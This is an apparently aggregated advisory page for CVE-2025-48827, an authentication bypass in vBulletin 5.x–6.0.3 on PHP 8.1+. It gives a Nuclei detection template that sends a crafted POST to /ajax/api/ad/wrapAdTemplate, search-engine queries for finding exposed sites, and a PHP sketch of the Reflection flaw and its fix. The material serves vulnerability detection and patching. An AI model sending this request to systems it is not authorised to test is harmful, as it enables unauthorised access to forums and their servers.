vBulletin 5.0.0-6.0.3 - Authentication Bypass

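Vulnerability Information

Vulnerability name: vBulletin 5.0.0-6.0.3 - Authentication Bypass

Vulnerability ID:

  • CVE: CVE-2025-48827

Vulnerability type: Authorization bypass

Severity: Critical

Description: vBulletin is widely used forum software that supports features such as posting and user management, and is common on both corporate and personal websites. Versions 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass vulnerability. On PHP 8.1 or later, an unauthenticated attacker can access protected API controllers and so invoke protected methods remotely. This results from an internal adjustment in PHP 8.1 to ReflectionMethod::invoke() and related methods, which by default allows protected/private methods to be invoked through PHP's Reflection API. An attacker who successfully exploits the vulnerability can execute arbitrary system commands as the web server user, resulting in full system compromise. Exploitation requires no authentication and can be automated remotely, so the risk is extremely high. Users are advised to upgrade to vBulletin 6.0.4 or later, and to avoid using PHP 8.1 or later before upgrading.

Vendor: vbulletin

Product: vbulletin

Affected versions: 5.0.0 <= version <= 5.7.5, 6.0.0 <= version <= 6.0.3

Search query: app="vBulletin"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/66d25cb89009a2cd5c26275197ad828f28392212/http%2Fcves%2F2025%2FCVE-2025-48827.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details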


id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely. Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type,'application/json')
          - contains_all(body,'<div class=','{{rand_string}}','{{rand_value}}','/div>')
        condition: and
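
The description attributes the bypass to the PHP 8.1 change in ReflectionMethod::invoke(). The sketch below is an added example, not vBulletin's code or the vendor's patch: a constructed controller and two hypothetical dispatchers (DemoApiController, dispatchUnchecked, dispatchChecked are assumed names) show how the same call behaves before and after PHP 8.1, and how an explicit isPublic() check keeps protected methods unreachable on any PHP version.

```php
<?php
// Constructed toy controller, not vBulletin code.
class DemoApiController
{
    public function ping(): string { return 'pong'; }
    protected function internalOnly(): string { return 'protected body ran'; }
}

// Relies on Reflection to refuse non-public methods. Before PHP 8.1,
// invoke() threw ReflectionException here; from 8.1 on the method just runs.
function dispatchUnchecked(object $controller, string $method): string
{
    $rm = new ReflectionMethod($controller, $method);
    return (string) $rm->invoke($controller);
}

// Enforces visibility explicitly, so the result does not depend on the PHP version.
function dispatchChecked(object $controller, string $method): string
{
    $rm = new ReflectionMethod($controller, $method);
    if (!$rm->isPublic()) {
        throw new RuntimeException("refusing non-public method: $method");
    }
    return (string) $rm->invoke($controller);
}

// Run both dispatchers against the public and the protected method.
$controller = new DemoApiController();
foreach (['dispatchUnchecked', 'dispatchChecked'] as $dispatch) {
    foreach (['ping', 'internalOnly'] as $method) {
        try {
            $result = $dispatch($controller, $method);
        } catch (Throwable $e) {
            $result = 'refused (' . get_class($e) . ')';
        }
        printf("PHP %s  %-17s %-12s => %s\n", PHP_VERSION, $dispatch, $method, $result);
    }
}
```

Running the script under PHP 8.0 and again under PHP 8.1 or later shows the difference: only the unchecked dispatcher changes its answer for internalOnly.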



Author
lianccc
Published
July 9, 2025